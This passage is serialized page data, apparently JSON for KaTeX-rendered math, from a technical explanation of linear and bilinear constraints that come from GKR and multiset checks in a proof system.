3552},{"className":123551,"style":2752},[246],[123553],{"type":31,"value":7031},{"type":25,"tag":216,"props":123555,"children":123557},{"className":123556},[246,31],[123558],{"type":25,"tag":216,"props":123559,"children":123561},{"className":123560},[246],[123562],{"type":31,"value":122657},{"type":25,"tag":216,"props":123564,"children":123566},{"className":123565,"style":2752},[246],[123567],{"type":31,"value":7031},{"type":25,"tag":216,"props":123569,"children":123571},{"className":123570},[246],[123572,123581],{"type":25,"tag":216,"props":123573,"children":123575},{"className":123574},[246,31],[123576],{"type":25,"tag":216,"props":123577,"children":123579},{"className":123578},[246],[123580],{"type":31,"value":122676},{"type":25,"tag":216,"props":123582,"children":123584},{"className":123583},[2159],[123585],{"type":25,"tag":216,"props":123586,"children":123588},{"className":123587},[298,299],[123589,123618],{"type":25,"tag":216,"props":123590,"children":123592},{"className":123591},[304],[123593,123613],{"type":25,"tag":216,"props":123594,"children":123596},{"className":123595,"style":2270},[309],[123597],{"type":25,"tag":216,"props":123598,"children":123599},{"style":118114},[123600,123604],{"type":25,"tag":216,"props":123601,"children":123603},{"className":123602,"style":2181},[319],[],{"type":25,"tag":216,"props":123605,"children":123607},{"className":123606},[2186,2187,2188,2189],[123608],{"type":25,"tag":216,"props":123609,"children":123611},{"className":123610,"style":118207},[246,2151,2189],[123612],{"type":31,"value":12609},{"type":25,"tag":216,"props":123614,"children":123616},{"className":123615},[408],[123617],{"type":31,"value":411},{"type":25,"tag":216,"props":123619,"children":123621},{"className":123620},[304],[123622],{"type":25,"tag":216,"props":123623,"children":123625},{"className":123624,"style":122893},[309],[123626],{"type":25,"tag":216,"props":123627,"children":123628},{},[],{"type":25,"tag":216,"props":123630,"children":123632},{"className":123631,"style":335},[257],[],{"type":25,"tag":216,"props":123634,"children":123636},{"className":123635},[340],[123637],{"type":31,"value":343},{"type":25,"tag":216,"props":123639,"children":123641},{"className":123640,"style":335},[257],[],{"type":25,"tag":216,"props":123643,"children":123645},{"className":123644},[235],[123646,123650,123655,123664],{"type":25,"tag":216,"props":123647,"children":123649},{"className":123648,"style":5513},[240],[],{"type":25,"tag":216,"props":123651,"children":123653},{"className":123652},[287],[123654],{"type":31,"value":1850},{"type":25,"tag":216,"props":123656,"children":123658},{"className":123657},[246,31],[123659],{"type":25,"tag":216,"props":123660,"children":123662},{"className":123661},[246],[123663],{"type":31,"value":122933},{"type":25,"tag":216,"props":123665,"children":123667},{"className":123666},[427],[123668],{"type":31,"value":1888},{"type":25,"tag":38,"props":123670,"children":123671},{},[123672,123674,123843,123844,124013],{"type":31,"value":123673},"If we vary ",{"type":25,"tag":82,"props":123675,"children":123677},{"className":123676},[212,4702],[123678],{"type":25,"tag":216,"props":123679,"children":123681},{"className":123680},[224],[123682],{"type":25,"tag":216,"props":123683,"children":123685},{"className":123684,"ariaHidden":230},[229],[123686,123764],{"type":25,"tag":216,"props":123687,"children":123689},{"className":123688},[235],[123690,123694,123751,123755,123760],{"type":25,"tag":216,"props":123691,"children":123693},{"className":123692,"style":4827},[240],[],{"type":25,"tag":216,"props":123695,"children":123697},{"className":123696},[246],[123698,123703],{"type":25,"tag":216,"props":123699,"children":123701},{"className":123700},[246,2151],[123702],{"type":31,"value":2541},{"type":25,"tag":216,"props":123704,"children":123706},{"className":123705},[2159],[123707],{"type":25,"tag":216,"props":123708,"children":123710},{"className":123709},[298,299],[123711,123740],{"type":25,"tag":216,"props":123712,"children":123714},{"className":123713},[304],[123715,123735],{"type":25,"tag":216,"props":123716,"children":123718},{"className":123717,"style":97069},[309],[123719],{"type":25,"tag":216,"props":123720,"children":123721},{"style":2274},[123722,123726],{"type":25,"tag":216,"props":123723,"children":123725},{"className":123724,"style":2181},[319],[],{"type":25,"tag":216,"props":123727,"children":123729},{"className":123728},[2186,2187,2188,2189],[123730],{"type":25,"tag":216,"props":123731,"children":123733},{"className":123732},[246,2189],[123734],{"type":31,"value":1882},{"type":25,"tag":216,"props":123736,"children":123738},{"className":123737},[408],[123739],{"type":31,"value":411},{"type":25,"tag":216,"props":123741,"children":123743},{"className":123742},[304],[123744],{"type":25,"tag":216,"props":123745,"children":123747},{"className":123746,"style":2209},[309],[123748],{"type":25,"tag":216,"props":123749,"children":123750},{},[],{"type":25,"tag":216,"props":123752,"children":123754},{"className":123753,"style":258},[257],[],{"type":25,"tag":216,"props":123756,"children":123758},{"className":123757},[263],[123759],{"type":31,"value":266},{"type":25,"tag":216,"props":123761,"children":123763},{"className":123762,"style":258},[257],[],{"type":25,"tag":216,"props":123765,"children":123767},{"className":123766},[235],[123768,123772,123813,123818,123823,123828,123833,123838],{"type":25,"tag":216,"props":123769,"children":123771},{"className":123770,"style":96960},[240],[],{"type":25,"tag":216,"props":123773,"children":123775},{"className":123774},[246],[123776,123785,123790,123799,123804],{"type":25,"tag":216,"props":123777,"children":123779},{"className":123778},[246,31],[123780],{"type":25,"tag":216,"props":123781,"children":123783},{"className":123782},[246],[123784],{"type":31,"value":97829},{"type":25,"tag":216,"props":123786,"children":123788},{"className":123787,"style":2752},[246],[123789],{"type":31,"value":7031},{"type":25,"tag":216,"props":123791,"children":123793},{"className":123792},[246,31],[123794],{"type":25,"tag":216,"props":123795,"children":123797},{"className":123796},[246],[123798],{"type":31,"value":122657},{"type":25,"tag":216,"props":123800,"children":123802},{"className":123801,"style":2752},[246],[123803],{"type":31,"value":7031},{"type":25,"tag":216,"props":123805,"children":123807},{"className":123806},[246,31],[123808],{"type":25,"tag":216,"props":123809,"children":123811},{"className":123810},[246],[123812],{"type":31,"value":122676},{"type":25,"tag":216,"props":123814,"children":123816},{"className":123815},[287],[123817],{"type":31,"value":7701},{"type":25,"tag":216,"props":123819,"children":123821},{"className":123820},[246],[123822],{"type":31,"value":1882},{"type":25,"tag":216,"props":123824,"children":123826},{"className":123825},[427],[123827],{"type":31,"value":19368},{"type":25,"tag":216,"props":123829,"children":123831},{"className":123830},[287],[123832],{"type":31,"value":7701},{"type":25,"tag":216,"props":123834,"children":123836},{"className":123835},[246],[123837],{"type":31,"value":1882},{"type":25,"tag":216,"props":123839,"children":123841},{"className":123840},[427],[123842],{"type":31,"value":19368},{"type":31,"value":1307},{"type":25,"tag":82,"props":123845,"children":123847},{"className":123846},[212,4702],[123848],{"type":25,"tag":216,"props":123849,"children":123851},{"className":123850},[224],[123852],{"type":25,"tag":216,"props":123853,"children":123855},{"className":123854,"ariaHidden":230},[229],[123856,123934],{"type":25,"tag":216,"props":123857,"children":123859},{"className":123858},[235],[123860,123864,123921,123925,123930],{"type":25,"tag":216,"props":123861,"children":123863},{"className":123862,"style":4827},[240],[],{"type":25,"tag":216,"props":123865,"children":123867},{"className":123866},[246],[123868,123873],{"type":25,"tag":216,"props":123869,"children":123871},{"className":123870},[246,2151],[123872],{"type":31,"value":2541},{"type":25,"tag":216,"props":123874,"children":123876},{"className":123875},[2159],[123877],{"type":25,"tag":216,"props":123878,"children":123880},{"className":123879},[298,299],[123881,123910],{"type":25,"tag":216,"props":123882,"children":123884},{"className":123883},[304],[123885,123905],{"type":25,"tag":216,"props":123886,"children":123888},{"className":123887,"style":97069},[309],[123889],{"type":25,"tag":216,"props":123890,"children":123891},{"style":2274},[123892,123896],{"type":25,"tag":216,"props":123893,"children":123895},{"className":123894,"style":2181},[319],[],{"type":25,"tag":216,"props":123897,"children":123899},{"className":123898},[2186,2187,2188,2189],[123900],{"type":25,"tag":216,"props":123901,"children":123903},{"className":123902},[246,2189],[123904],{"type":31,"value":184},{"type":25,"tag":216,"props":123906,"children":123908},{"className":123907},[408],[123909],{"type":31,"value":411},{"type":25,"tag":216,"props":123911,"children":123913},{"className":123912},[304],[123914],{"type":25,"tag":216,"props":123915,"children":123917},{"className":123916,"style":2209},[309],[123918],{"type":25,"tag":216,"props":123919,"children":123920},{},[],{"type":25,"tag":216,"props":123922,"children":123924},{"className":123923,"style":258},[257],[],{"type":25,"tag":216,"props":123926,"children":123928},{"className":123927},[263],[123929],{"type":31,"value":266},{"type":25,"tag":216,"props":123931,"children":123933},{"className":123932,"style":258},[257],[],{"type":25,"tag":216,"props":123935,"children":123937},{"className":123936},[235],[123938,123942,123983,123988,123993,123998,124003,124008],{"type":25,"tag":216,"props":123939,"children":123941},{"className":123940,"style":96960},[240],[],{"type":25,"tag":216,"props":123943,"children":123945},{"className":123944},[246],[123946,123955,123960,123969,123974],{"type":25,"tag":216,"props":123947,"children":123949},{"className":123948},[246,31],[123950],{"type":25,"tag":216,"props":123951,"children":123953},{"className":123952},[246],[123954],{"type":31,"value":97829},{"type":25,"tag":216,"props":123956,"children":123958},{"className":123957,"style":2752},[246],[123959],{"type":31,"value":7031},{"type":25,"tag":216,"props":123961,"children":123963},{"className":123962},[246,31],[123964],{"type":25,"tag":216,"props":123965,"children":123967},{"className":123966},[246],[123968],{"type":31,"value":122657},{"type":25,"tag":216,"props":123970,"children":123972},{"className":123971,"style":2752},[246],[123973],{"type":31,"value":7031},{"type":25,"tag":216,"props":123975,"children":123977},{"className":123976},[246,31],[123978],{"type":25,"tag":216,"props":123979,"children":123981},{"className":123980},[246],[123982],{"type":31,"value":122676},{"type":25,"tag":216,"props":123984,"children":123986},{"className":123985},[287],[123987],{"type":31,"value":7701},{"type":25,"tag":216,"props":123989,"children":123991},{"className":123990},[246],[123992],{"type":31,"value":1882},{"type":25,"tag":216,"props":123994,"children":123996},{"className":123995},[427],[123997],{"type":31,"value":19368},{"type":25,"tag":216,"props":123999,"children":124001},{"className":124000},[287],[124002],{"type":31,"value":7701},{"type":25,"tag":216,"props":124004,"children":124006},{"className":124005},[246],[124007],{"type":31,"value":184},{"type":25,"tag":216,"props":124009,"children":124011},{"className":124010},[427],[124012],{"type":31,"value":19368},{"type":31,"value":124014}," we get the following constraint:",{"type":25,"tag":38,"props":124016,"children":124017},{},[124018],{"type":25,"tag":82,"props":124019,"children":124021},{"className":124020},[212,4702],[124022],{"type":25,"tag":216,"props":124023,"children":124025},{"className":124024},[224],[124026],{"type":25,"tag":216,"props":124027,"children":124029},{"className":124028,"ariaHidden":230},[229],[124030,124109,124187,124228],{"type":25,"tag":216,"props":124031,"children":124033},{"className":124032},[235],[124034,124039,124096,124100,124105],{"type":25,"tag":216,"props":124035,"children":124038},{"className":124036,"style":124037},[240],"height:0.5945em;vertical-align:-0.15em;",[],{"type":25,"tag":216,"props":124040,"children":124042},{"className":124041},[246],[124043,124048],{"type":25,"tag":216,"props":124044,"children":124046},{"className":124045},[246,2151],[124047],{"type":31,"value":2541},{"type":25,"tag":216,"props":124049,"children":124051},{"className":124050},[2159],[124052],{"type":25,"tag":216,"props":124053,"children":124055},{"className":124054},[298,299],[124056,124085],{"type":25,"tag":216,"props":124057,"children":124059},{"className":124058},[304],[124060,124080],{"type":25,"tag":216,"props":124061,"children":124063},{"className":124062,"style":97069},[309],[124064],{"type":25,"tag":216,"props":124065,"children":124066},{"style":2274},[124067,124071],{"type":25,"tag":216,"props":124068,"children":124070},{"className":124069,"style":2181},[319],[],{"type":25,"tag":216,"props":124072,"children":124074},{"className":124073},[2186,2187,2188,2189],[124075],{"type":25,"tag":216,"props":124076,"children":124078},{"className":124077},[246,2189],[124079],{"type":31,"value":1882},{"type":25,"tag":216,"props":124081,"children":124083},{"className":124082},[408],[124084],{"type":31,"value":411},{"type":25,"tag":216,"props":124086,"children":124088},{"className":124087},[304],[124089],{"type":25,"tag":216,"props":124090,"children":124092},{"className":124091,"style":2209},[309],[124093],{"type":25,"tag":216,"props":124094,"children":124095},{},[],{"type":25,"tag":216,"props":124097,"children":124099},{"className":124098,"style":335},[257],[],{"type":25,"tag":216,"props":124101,"children":124103},{"className":124102},[340],[124104],{"type":31,"value":343},{"type":25,"tag":216,"props":124106,"children":124108},{"className":124107,"style":335},[257],[],{"type":25,"tag":216,"props":124110,"children":124112},{"className":124111},[235],[124113,124117,124174,124178,124183],{"type":25,"tag":216,"props":124114,"children":124116},{"className":124115,"style":124037},[240],[],{"type":25,"tag":216,"props":124118,"children":124120},{"className":124119},[246],[124121,124126],{"type":25,"tag":216,"props":124122,"children":124124},{"className":124123},[246,2151],[124125],{"type":31,"value":2541},{"type":25,"tag":216,"props":124127,"children":124129},{"className":124128},[2159],[124130],{"type":25,"tag":216,"props":124131,"children":124133},{"className":124132},[298,299],[124134,124163],{"type":25,"tag":216,"props":124135,"children":124137},{"className":124136},[304],[124138,124158],{"type":25,"tag":216,"props":124139,"children":124141},{"className":124140,"style":97069},[309],[124142],{"type":25,"tag":216,"props":124143,"children":124144},{"style":2274},[124145,124149],{"type":25,"tag":216,"props":124146,"children":124148},{"className":124147,"style":2181},[319],[],{"type":25,"tag":216,"props":124150,"children":124152},{"className":124151},[2186,2187,2188,2189],[124153],{"type":25,"tag":216,"props":124154,"children":124156},{"className":124155},[246,2189],[124157],{"type":31,"value":184},{"type":25,"tag":216,"props":124159,"children":124161},{"className":124160},[408],[124162],{"type":31,"value":411},{"type":25,"tag":216,"props":124164,"children":124166},{"className":124165},[304],[124167],{"type":25,"tag":216,"props":124168,"children":124170},{"className":124169,"style":2209},[309],[124171],{"type":25,"tag":216,"props":124172,"children":124173},{},[],{"type":25,"tag":216,"props":124175,"children":124177},{"className":124176,"style":335},[257],[],{"type":25,"tag":216,"props":124179,"children":124181},{"className":124180},[340],[124182],{"type":31,"value":343},{"type":25,"tag":216,"props":124184,"children":124186},{"className":124185,"style":335},[257],[],{"type":25,"tag":216,"props":124188,"children":124190},{"className":124189},[235],[124191,124195,124200,124210,124215,124219,124224],{"type":25,"tag":216,"props":124192,"children":124194},{"className":124193,"style":5513},[240],[],{"type":25,"tag":216,"props":124196,"children":124198},{"className":124197},[287],[124199],{"type":31,"value":1850},{"type":25,"tag":216,"props":124201,"children":124203},{"className":124202},[246,31],[124204],{"type":25,"tag":216,"props":124205,"children":124207},{"className":124206},[246],[124208],{"type":31,"value":124209},"rest of product",{"type":25,"tag":216,"props":124211,"children":124213},{"className":124212},[427],[124214],{"type":31,"value":1888},{"type":25,"tag":216,"props":124216,"children":124218},{"className":124217,"style":258},[257],[],{"type":25,"tag":216,"props":124220,"children":124222},{"className":124221},[263],[124223],{"type":31,"value":266},{"type":25,"tag":216,"props":124225,"children":124227},{"className":124226,"style":258},[257],[],{"type":25,"tag":216,"props":124229,"children":124231},{"className":124230},[235],[124232,124236],{"type":25,"tag":216,"props":124233,"children":124235},{"className":124234,"style":119004},[240],[],{"type":25,"tag":216,"props":124237,"children":124239},{"className":124238},[246,31],[124240],{"type":25,"tag":216,"props":124241,"children":124243},{"className":124242},[246],[124244],{"type":31,"value":119015},{"type":25,"tag":38,"props":124246,"children":124247},{},[124248,124250,124403],{"type":31,"value":124249},"This is bilinear in ",{"type":25,"tag":82,"props":124251,"children":124253},{"className":124252},[212,4702],[124254],{"type":25,"tag":216,"props":124255,"children":124257},{"className":124256},[224],[124258],{"type":25,"tag":216,"props":124259,"children":124261},{"className":124260,"ariaHidden":230},[229],[124262],{"type":25,"tag":216,"props":124263,"children":124265},{"className":124264},[235],[124266,124270,124275,124332,124337,124341,124398],{"type":25,"tag":216,"props":124267,"children":124269},{"className":124268,"style":5513},[240],[],{"type":25,"tag":216,"props":124271,"children":124273},{"className":124272},[287],[124274],{"type":31,"value":1850},{"type":25,"tag":216,"props":124276,"children":124278},{"className":124277},[246],[124279,124284],{"type":25,"tag":216,"props":124280,"children":124282},{"className":124281},[246,2151],[124283],{"type":31,"value":2541},{"type":25,"tag":216,"props":124285,"children":124287},{"className":124286},[2159],[124288],{"type":25,"tag":216,"props":124289,"children":124291},{"className":124290},[298,299],[124292,124321],{"type":25,"tag":216,"props":124293,"children":124295},{"className":124294},[304],[124296,124316],{"type":25,"tag":216,"props":124297,"children":124299},{"className":124298,"style":97069},[309],[124300],{"type":25,"tag":216,"props":124301,"children":124302},{"style":2274},[124303,124307],{"type":25,"tag":216,"props":124304,"children":124306},{"className":124305,"style":2181},[319],[],{"type":25,"tag":216,"props":124308,"children":124310},{"className":124309},[2186,2187,2188,2189],[124311],{"type":25,"tag":216,"props":124312,"children":124314},{"className":124313},[246,2189],[124315],{"type":31,"value":1882},{"type":25,"tag":216,"props":124317,"children":124319},{"className":124318},[408],[124320],{"type":31,"value":411},{"type":25,"tag":216,"props":124322,"children":124324},{"className":124323},[304],[124325],{"type":25,"tag":216,"props":124326,"children":124328},{"className":124327,"style":2209},[309],[124329],{"type":25,"tag":216,"props":124330,"children":124331},{},[],{"type":25,"tag":216,"props":124333,"children":124335},{"className":124334},[1864],[124336],{"type":31,"value":1867},{"type":25,"tag":216,"props":124338,"children":124340},{"className":124339,"style":1871},[257],[],{"type":25,"tag":216,"props":124342,"children":124344},{"className":124343},[246],[124345,124350],{"type":25,"tag":216,"props":124346,"children":124348},{"className":124347},[246,2151],[124349],{"type":31,"value":2541},{"type":25,"tag":216,"props":124351,"children":124353},{"className":124352},[2159],[124354],{"type":25,"tag":216,"props":124355,"children":124357},{"className":124356},[298,299],[124358,124387],{"type":25,"tag":216,"props":124359,"children":124361},{"className":124360},[304],[124362,124382],{"type":25,"tag":216,"props":124363,"children":124365},{"className":124364,"style":97069},[309],[124366],{"type":25,"tag":216,"props":124367,"children":124368},{"style":2274},[124369,124373],{"type":25,"tag":216,"props":124370,"children":124372},{"className":124371,"style":2181},[319],[],{"type":25,"tag":216,"props":124374,"children":124376},{"className":124375},[2186,2187,2188,2189],[124377],{"type":25,"tag":216,"props":124378,"children":124380},{"className":124379},[246,2189],[124381],{"type":31,"value":184},{"type":25,"tag":216,"props":124383,"children":124385},{"className":124384},[408],[124386],{"type":31,"value":411},{"type":25,"tag":216,"props":124388,"children":124390},{"className":124389},[304],[124391],{"type":25,"tag":216,"props":124392,"children":124394},{"className":124393,"style":2209},[309],[124395],{"type":25,"tag":216,"props":124396,"children":124397},{},[],{"type":25,"tag":216,"props":124399,"children":124401},{"className":124400},[427],[124402],{"type":31,"value":1888},{"type":31,"value":179},{"type":25,"tag":38,"props":124405,"children":124406},{},[124407,124409,124562],{"type":31,"value":124408},"We have two unknowns ",{"type":25,"tag":82,"props":124410,"children":124412},{"className":124411},[212,4702],[124413],{"type":25,"tag":216,"props":124414,"children":124416},{"className":124415},[224],[124417],{"type":25,"tag":216,"props":124418,"children":124420},{"className":124419,"ariaHidden":230},[229],[124421],{"type":25,"tag":216,"props":124422,"children":124424},{"className":124423},[235],[124425,124429,124434,124491,124496,124500,124557],{"type":25,"tag":216,"props":124426,"children":124428},{"className":124427,"style":5513},[240],[],{"type":25,"tag":216,"props":124430,"children":124432},{"className":124431},[287],[124433],{"type":31,"value":1850},{"type":25,"tag":216,"props":124435,"children":124437},{"className":124436},[246],[124438,124443],{"type":25,"tag":216,"props":124439,"children":124441},{"className":124440},[246,2151],[124442],{"type":31,"value":2541},{"type":25,"tag":216,"props":124444,"children":124446},{"className":124445},[2159],[124447],{"type":25,"tag":216,"props":124448,"children":124450},{"className":124449},[298,299],[124451,124480],{"type":25,"tag":216,"props":124452,"children":124454},{"className":124453},[304],[124455,124475],{"type":25,"tag":216,"props":124456,"children":124458},{"className":124457,"style":97069},[309],[124459],{"type":25,"tag":216,"props":124460,"children":124461},{"style":2274},[124462,124466],{"type":25,"tag":216,"props":124463,"children":124465},{"className":124464,"style":2181},[319],[],{"type":25,"tag":216,"props":124467,"children":124469},{"className":124468},[2186,2187,2188,2189],[124470],{"type":25,"tag":216,"props":124471,"children":124473},{"className":124472},[246,2189],[124474],{"type":31,"value":1882},{"type":25,"tag":216,"props":124476,"children":124478},{"className":124477},[408],[124479],{"type":31,"value":411},{"type":25,"tag":216,"props":124481,"children":124483},{"className":124482},[304],[124484],{"type":25,"tag":216,"props":124485,"children":124487},{"className":124486,"style":2209},[309],[124488],{"type":25,"tag":216,"props":124489,"children":124490},{},[],{"type":25,"tag":216,"props":124492,"children":124494},{"className":124493},[1864],[124495],{"type":31,"value":1867},{"type":25,"tag":216,"props":124497,"children":124499},{"className":124498,"style":1871},[257],[],{"type":25,"tag":216,"props":124501,"children":124503},{"className":124502},[246],[124504,124509],{"type":25,"tag":216,"props":124505,"children":124507},{"className":124506},[246,2151],[124508],{"type":31,"value":2541},{"type":25,"tag":216,"props":124510,"children":124512},{"className":124511},[2159],[124513],{"type":25,"tag":216,"props":124514,"children":124516},{"className":124515},[298,299],[124517,124546],{"type":25,"tag":216,"props":124518,"children":124520},{"className":124519},[304],[124521,124541],{"type":25,"tag":216,"props":124522,"children":124524},{"className":124523,"style":97069},[309],[124525],{"type":25,"tag":216,"props":124526,"children":124527},{"style":2274},[124528,124532],{"type":25,"tag":216,"props":124529,"children":124531},{"className":124530,"style":2181},[319],[],{"type":25,"tag":216,"props":124533,"children":124535},{"className":124534},[2186,2187,2188,2189],[124536],{"type":25,"tag":216,"props":124537,"children":124539},{"className":124538},[246,2189],[124540],{"type":31,"value":184},{"type":25,"tag":216,"props":124542,"children":124544},{"className":124543},[408],[124545],{"type":31,"value":411},{"type":25,"tag":216,"props":124547,"children":124549},{"className":124548},[304],[124550],{"type":25,"tag":216,"props":124551,"children":124553},{"className":124552,"style":2209},[309],[124554],{"type":25,"tag":216,"props":124555,"children":124556},{},[],{"type":25,"tag":216,"props":124558,"children":124560},{"className":124559},[427],[124561],{"type":31,"value":1888},{"type":31,"value":124563}," and two equations, one linear and one bilinear:",{"type":25,"tag":6711,"props":124565,"children":124566},{},[124567,124894],{"type":25,"tag":2043,"props":124568,"children":124569},{},[124570,124572],{"type":31,"value":124571},"Linear (from GKR): ",{"type":25,"tag":82,"props":124573,"children":124575},{"className":124574},[212,4702],[124576],{"type":25,"tag":216,"props":124577,"children":124579},{"className":124578},[224],[124580],{"type":25,"tag":216,"props":124581,"children":124583},{"className":124582,"ariaHidden":230},[229],[124584,124720,124855,124881],{"type":25,"tag":216,"props":124585,"children":124587},{"className":124586},[235],[124588,124593,124650,124707,124711,124716],{"type":25,"tag":216,"props":124589,"children":124592},{"className":124590,"style":124591},[240],"height:0.7333em;vertical-align:-0.15em;",[],{"type":25,"tag":216,"props":124594,"children":124596},{"className":124595},[246],[124597,124602],{"type":25,"tag":216,"props":124598,"children":124600},{"className":124599},[246,2151],[124601],{"type":31,"value":162},{"type":25,"tag":216,"props":124603,"children":124605},{"className":124604},[2159],[124606],{"type":25,"tag":216,"props":124607,"children":124609},{"className":124608},[298,299],[124610,124639],{"type":25,"tag":216,"props":124611,"children":124613},{"className":124612},[304],[124614,124634],{"type":25,"tag":216,"props":124615,"children":124617},{"className":124616,"style":97069},[309],[124618],{"type":25,"tag":216,"props":124619,"children":124620},{"style":2274},[124621,124625],{"type":25,"tag":216,"props":124622,"children":124624},{"className":124623,"style":2181},[319],[],{"type":25,"tag":216,"props":124626,"children":124628},{"className":124627},[2186,2187,2188,2189],[124629],{"type":25,"tag":216,"props":124630,"children":124632},{"className":124631},[246,2189],[124633],{"type":31,"value":1882},{"type":25,"tag":216,"props":124635,"children":124637},{"className":124636},[408],[124638],{"type":31,"value":411},{"type":25,"tag":216,"props":124640,"children":124642},{"className":124641},[304],[124643],{"type":25,"tag":216,"props":124644,"children":124646},{"className":124645,"style":2209},[309],[124647],{"type":25,"tag":216,"props":124648,"children":124649},{},[],{"type":25,"tag":216,"props":124651,"children":124653},{"className":124652},[246],[124654,124659],{"type":25,"tag":216,"props":124655,"children":124657},{"className":124656},[246,2151],[124658],{"type":31,"value":2541},{"type":25,"tag":216,"props":124660,"children":124662},{"className":124661},[2159],[124663],{"type":25,"tag":216,"props":124664,"children":124666},{"className":124665},[298,299],[124667,124696],{"type":25,"tag":216,"props":124668,"children":124670},{"className":124669},[304],[124671,124691],{"type":25,"tag":216,"props":124672,"children":124674},{"className":124673,"style":97069},[309],[124675],{"type":25,"tag":216,"props":124676,"children":124677},{"style":2274},[124678,124682],{"type":25,"tag":216,"props":124679,"children":124681},{"className":124680,"style":2181},[319],[],{"type":25,"tag":216,"props":124683,"children":124685},{"className":124684},[2186,2187,2188,2189],[124686],{"type":25,"tag":216,"props":124687,"children":124689},{"className":124688},[246,2189],[124690],{"type":31,"value":1882},{"type":25,"tag":216,"props":124692,"children":124694},{"className":124693},[408],[124695],{"type":31,"value":411},{"type":25,"tag":216,"props":124697,"children":124699},{"className":124698},[304],[124700],{"type":25,"tag":216,"props":124701,"children":124703},{"className":124702,"style":2209},[309],[124704],{"type":25,"tag":216,"props":124705,"children":124706},{},[],{"type":25,"tag":216,"props":124708,"children":124710},{"className":124709,"style":335},[257],[],{"type":25,"tag":216,"props":124712,"children":124714},{"className":124713},[340],[124715],{"type":31,"value":3539},{"type":25,"tag":216,"props":124717,"children":124719},{"className":124718,"style":335},[257],[],{"type":25,"tag":216,"props":124721,"children":124723},{"className":124722},[235],[124724,124728,124785,124842,124846,124851],{"type":25,"tag":216,"props":124725,"children":124727},{"className":124726,"style":124591},[240],[],{"type":25,"tag":216,"props":124729,"children":124731},{"className":124730},[246],[124732,124737],{"type":25,"tag":216,"props":124733,"children":124735},{"className":124734},[246,2151],[124736],{"type":31,"value":162},{"type":25,"tag":216,"props":124738,"children":124740},{"className":124739},[2159],[124741],{"type":25,"tag":216,"props":124742,"children":124744},{"className":124743},[298,299],[124745,124774],{"type":25,"tag":216,"props":124746,"children":124748},{"className":124747},[304],[124749,124769],{"type":25,"tag":216,"props":124750,"children":124752},{"className":124751,"style":97069},[309],[124753],{"type":25,"tag":216,"props":124754,"children":124755},{"style":2274},[124756,124760],{"type":25,"tag":216,"props":124757,"children":124759},{"className":124758,"style":2181},[319],[],{"type":25,"tag":216,"props":124761,"children":124763},{"className":124762},[2186,2187,2188,2189],[124764],{"type":25,"tag":216,"props":124765,"children":124767},{"className":124766},[246,2189],[124768],{"type":31,"value":184},{"type":25,"tag":216,"props":124770,"children":124772},{"className":124771},[408],[124773],{"type":31,"value":411},{"type":25,"tag":216,"props":124775,"children":124777},{"className":124776},[304],[124778],{"type":25,"tag":216,"props":124779,"children":124781},{"className":124780,"style":2209},[309],[124782],{"type":25,"tag":216,"props":124783,"children":124784},{},[],{"type":25,"tag":216,"props":124786,"children":124788},{"className":124787},[246],[124789,124794],{"type":25,"tag":216,"props":124790,"children":124792},{"className":124791},[246,2151],[124793],{"type":31,"value":2541},{"type":25,"tag":216,"props":124795,"children":124797},{"className":124796},[2159],[124798],{"type":25,"tag":216,"props":124799,"children":124801},{"className":124800},[298,299],[124802,124831],{"type":25,"tag":216,"props":124803,"children":124805},{"className":124804},[304],[124806,124826],{"type":25,"tag":216,"props":124807,"children":124809},{"className":124808,"style":97069},[309],[124810],{"type":25,"tag":216,"props":124811,"children":124812},{"style":2274},[124813,124817],{"type":25,"tag":216,"props":124814,"children":124816},{"className":124815,"style":2181},[319],[],{"type":25,"tag":216,"props":124818,"children":124820},{"className":124819},[2186,2187,2188,2189],[124821],{"type":25,"tag":216,"props":124822,"children":124824},{"className":124823},[246,2189],[124825],{"type":31,"value":184},{"type":25,"tag":216,"props":124827,"children":124829},{"className":124828},[408],[124830],{"type":31,"value":411},{"type":25,"tag":216,"props":124832,"children":124834},{"className":124833},[304],[124835],{"type":25,"tag":216,"props":124836,"children":124838},{"className":124837,"style":2209},[309],[124839],{"type":25,"tag":216,"props":124840,"children":124841},{},[],{"type":25,"tag":216,"props":124843,"children":124845},{"className":124844,"style":335},[257],[],{"type":25,"tag":216,"props":124847,"children":124849},{"className":124848},[340],[124850],{"type":31,"value":3539},{"type":25,"tag":216,"props":124852,"children":124854},{"className":124853,"style":335},[257],[],{"type":25,"tag":216,"props":124856,"children":124858},{"className":124857},[235],[124859,124863,124868,124872,124877],{"type":25,"tag":216,"props":124860,"children":124862},{"className":124861,"style":6315},[240],[],{"type":25,"tag":216,"props":124864,"children":124866},{"className":124865},[246,2151],[124867],{"type":31,"value":2254},{"type":25,"tag":216,"props":124869,"children":124871},{"className":124870,"style":258},[257],[],{"type":25,"tag":216,"props":124873,"children":124875},{"className":124874},[263],[124876],{"type":31,"value":266},{"type":25,"tag":216,"props":124878,"children":124880},{"className":124879,"style":258},[257],[],{"type":25,"tag":216,"props":124882,"children":124884},{"className":124883},[235],[124885,124889],{"type":25,"tag":216,"props":124886,"children":124888},{"className":124887,"style":5293},[240],[],{"type":25,"tag":216,"props":124890,"children":124892},{"className":124891},[246],[124893],{"type":31,"value":1882},{"type":25,"tag":2043,"props":124895,"children":124896},{},[124897,124899],{"type":31,"value":124898},"Bilinear (from multiset): ",{"type":25,"tag":82,"props":124900,"children":124902},{"className":124901},[212,4702],[124903],{"type":25,"tag":216,"props":124904,"children":124906},{"className":124905},[224],[124907],{"type":25,"tag":216,"props":124908,"children":124910},{"className":124909,"ariaHidden":230},[229],[124911,124937,125015,125093,125119],{"type":25,"tag":216,"props":124912,"children":124914},{"className":124913},[235],[124915,124919,124924,124928,124933],{"type":25,"tag":216,"props":124916,"children":124918},{"className":124917,"style":96933},[240],[],{"type":25,"tag":216,"props":124920,"children":124922},{"className":124921,"style":98437},[246,2151],[124923],{"type":31,"value":92655},{"type":25,"tag":216,"props":124925,"children":124927},{"className":124926,"style":335},[257],[],{"type":25,"tag":216,"props":124929,"children":124931},{"className":124930},[340],[124932],{"type":31,"value":343},{"type":25,"tag":216,"props":124934,"children":124936},{"className":124935,"style":335},[257],[],{"type":25,"tag":216,"props":124938,"children":124940},{"className":124939},[235],[124941,124945,125002,125006,125011],{"type":25,"tag":216,"props":124942,"children":124944},{"className":124943,"style":124037},[240],[],{"type":25,"tag":216,"props":124946,"children":124948},{"className":124947},[246],[124949,124954],{"type":25,"tag":216,"props":124950,"children":124952},{"className":124951},[246,2151],[124953],{"type":31,"value":2541},{"type":25,"tag":216,"props":124955,"children":124957},{"className":124956},[2159],[124958],{"type":25,"tag":216,"props":124959,"children":124961},{"className":124960},[298,299],[124962,124991],{"type":25,